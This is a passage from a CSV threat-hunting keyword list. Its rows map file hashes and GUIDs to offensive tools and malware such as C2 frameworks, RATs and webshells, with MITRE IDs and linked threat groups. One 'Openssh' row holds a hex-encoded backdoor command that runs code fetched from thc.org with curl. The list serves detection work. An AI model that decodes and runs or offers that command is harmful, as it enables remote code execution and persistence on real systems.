"*5b05501598f6428054255538a2fedd435e439408e77f8b426c31b83597460565*",".{0,1000}5b05501598f6428054255538a2fedd435e439408e77f8b426c31b83597460565.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27295" "*5b08506beace8cb3c07dbab702e9d487eda75084fd80bc6054445adc4bffbb15*",".{0,1000}5b08506beace8cb3c07dbab702e9d487eda75084fd80bc6054445adc4bffbb15.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27296" 
"*5b0880987e5159342e78b77b382eec3cd12365cf2150ed486ebf17dca71902b3*",".{0,1000}5b0880987e5159342e78b77b382eec3cd12365cf2150ed486ebf17dca71902b3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27297" "*5b095728389373e05a038fea724aa2dd66c3ff68b830cc651fd92177afe8c8b3*",".{0,1000}5b095728389373e05a038fea724aa2dd66c3ff68b830cc651fd92177afe8c8b3.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","27298" "*5b14b133f4421557781cf8765d8a16bb5a6ca90ef5606dee10af7eee3107a18f*",".{0,1000}5b14b133f4421557781cf8765d8a16bb5a6ca90ef5606dee10af7eee3107a18f.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27301" "*5b1ce3529f7881a1252086a73bdbb45d6e9debb50f92b9c42fad341e34146437*",".{0,1000}5b1ce3529f7881a1252086a73bdbb45d6e9debb50f92b9c42fad341e34146437.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","27303" "*5b27fd5a98641cb68ad21f6be75f49291b0cc08fa091af2ba15ef3af0a3e22a2*",".{0,1000}5b27fd5a98641cb68ad21f6be75f49291b0cc08fa091af2ba15ef3af0a3e22a2.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27306" "*5b2ec674-0aa4-4209-94df-b6c995ad59c4*",".{0,1000}5b2ec674\-0aa4\-4209\-94df\-b6c995ad59c4.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","27307" "*5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695*",".{0,1000}5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27308" 
"*5b32dad4ad2b350157eda3061dc821645e7cd291970509ab32e9023b8c945951*",".{0,1000}5b32dad4ad2b350157eda3061dc821645e7cd291970509ab32e9023b8c945951.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","27309" "*5b36e42494ab562f7adb9c5dbf17761300050efd24c1c9c61dcb82e5bb628840*",".{0,1000}5b36e42494ab562f7adb9c5dbf17761300050efd24c1c9c61dcb82e5bb628840.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","#filehash","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","27310" "*5b3811e463d5b424593910cbf7fd06218e993f8399a9add27b053f98bc984587*",".{0,1000}5b3811e463d5b424593910cbf7fd06218e993f8399a9add27b053f98bc984587.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27311" "*5b4300844bcd004ff1d5415a81dde48c9b3505338e8ff1b8bdaeb5f89c415b46*",".{0,1000}5b4300844bcd004ff1d5415a81dde48c9b3505338e8ff1b8bdaeb5f89c415b46.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27314" "*5b46050219c918b47dc271a458450d384c4691f9ff96d174856946ff3fadffa9*",".{0,1000}5b46050219c918b47dc271a458450d384c4691f9ff96d174856946ff3fadffa9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27315" "*5b46bed3c8b76ee3d3b76dbd1dd5c45d79a6a623889aca85917c8777b12cdc86*",".{0,1000}5b46bed3c8b76ee3d3b76dbd1dd5c45d79a6a623889aca85917c8777b12cdc86.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27317" "*5b4dd71b0d9ac18c80db2eb0149e56af6b01533ff1e7a28359ca2f61ee0f8c8c*",".{0,1000}5b4dd71b0d9ac18c80db2eb0149e56af6b01533ff1e7a28359ca2f61ee0f8c8c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27318" "*5b52db9764212c3b11863100f5f6d34ad13af621fe9897edcea2392b39b2b70e*",".{0,1000}5b52db9764212c3b11863100f5f6d34ad13af621fe9897edcea2392b39b2b70e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27319" "*5b55d8a0b50b89156ef7d09cffede9385fdad53301c16f2570a1888e7ee1cdf7*",".{0,1000}5b55d8a0b50b89156ef7d09cffede9385fdad53301c16f2570a1888e7ee1cdf7.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#filehash","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","27322" "*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*",".{0,1000}5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira 
- Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","27323" "*5b5ec9cb61bbc187ad3ffdfaa6d782525d9574c9b3fcd5e694f0d25d60531074*",".{0,1000}5b5ec9cb61bbc187ad3ffdfaa6d782525d9574c9b3fcd5e694f0d25d60531074.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27324" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27325" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27326" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27327" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 
- T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27328" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27329" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27330" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27331" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27332" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 
- T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27333" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27334" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27335" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27336" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27337" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 
- T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27338" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27339" "*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27340" "*5b5f70992a0d5a59176a7bfb43401d56ab3d250958378f1d913405040bf7cf54*",".{0,1000}5b5f70992a0d5a59176a7bfb43401d56ab3d250958378f1d913405040bf7cf54.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","27341" "*5b6250d39e2f2855743616842353bab496aafcb7bc2a45169a54bc94f7939917*",".{0,1000}5b6250d39e2f2855743616842353bab496aafcb7bc2a45169a54bc94f7939917.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27342" "*5b64c12376f1ec1b876ede9b84f6883ee5f1ee5065e945dc2115c5e04c02aadf*",".{0,1000}5b64c12376f1ec1b876ede9b84f6883ee5f1ee5065e945dc2115c5e04c02aadf.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#filehash","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","27343" "*5b6868ca1b71f60e801421d7f1629422c0e894bf3c4d0d45778a483ca3d8a41a*",".{0,1000}5b6868ca1b71f60e801421d7f1629422c0e894bf3c4d0d45778a483ca3d8a41a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27345" "*5b71bad75d676d0520ed50ea05534dcfb748c19b68232adb5c5f3d9035814de6*",".{0,1000}5b71bad75d676d0520ed50ea05534dcfb748c19b68232adb5c5f3d9035814de6.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27346" "*5b77f324911a4a03654a78e1e870968a7d61e9ea07435bcc9d47891523677226*",".{0,1000}5b77f324911a4a03654a78e1e870968a7d61e9ea07435bcc9d47891523677226.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27347" "*5b989ce585f0c93fd67cc305fcf195755c498f19f5437151b9ce371460f6ab56*",".{0,1000}5b989ce585f0c93fd67cc305fcf195755c498f19f5437151b9ce371460f6ab56.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","27355" "*5b9dfce5f5a8bb0e00e99a77f8c7197742651de267b0e9438d54d9ba9f1137b4*",".{0,1000}5b9dfce5f5a8bb0e00e99a77f8c7197742651de267b0e9438d54d9ba9f1137b4.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","27357" "*5b9e669bea90a5dacd7c2432e9d02f1a66d7ed4d531df6c2870cc3238847193c*",".{0,1000}5b9e669bea90a5dacd7c2432e9d02f1a66d7ed4d531df6c2870cc3238847193c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27358" "*5ba1b5f60649f253556fa044849ea7af38cef5337c5061f06004687e0862d6c3*",".{0,1000}5ba1b5f60649f253556fa044849ea7af38cef5337c5061f06004687e0862d6c3.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27359" 
"*5ba530ebd87d7cb1bc0a2a368bdab568bf533a4da5399428feadc79a7947eb9d*",".{0,1000}5ba530ebd87d7cb1bc0a2a368bdab568bf533a4da5399428feadc79a7947eb9d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27360" "*5ba6551843aaa623f0acd46941837e7dfde53ebbb648187a7f92efd211909d4f*",".{0,1000}5ba6551843aaa623f0acd46941837e7dfde53ebbb648187a7f92efd211909d4f.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","27361" "*5ba7b38fa738e9bf7007d5f104c3437e15b9fa6b05e21f9383d52f888d6c7de3*",".{0,1000}5ba7b38fa738e9bf7007d5f104c3437e15b9fa6b05e21f9383d52f888d6c7de3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27362" "*5bb0b56e047e1453a3695ec0b9478b84*",".{0,1000}5bb0b56e047e1453a3695ec0b9478b84.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","27365" "*5bb73e9a41ee1e8ead70ed9fd3e9e7f0a253e84cb441b8c7889825364b62041e*",".{0,1000}5bb73e9a41ee1e8ead70ed9fd3e9e7f0a253e84cb441b8c7889825364b62041e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - 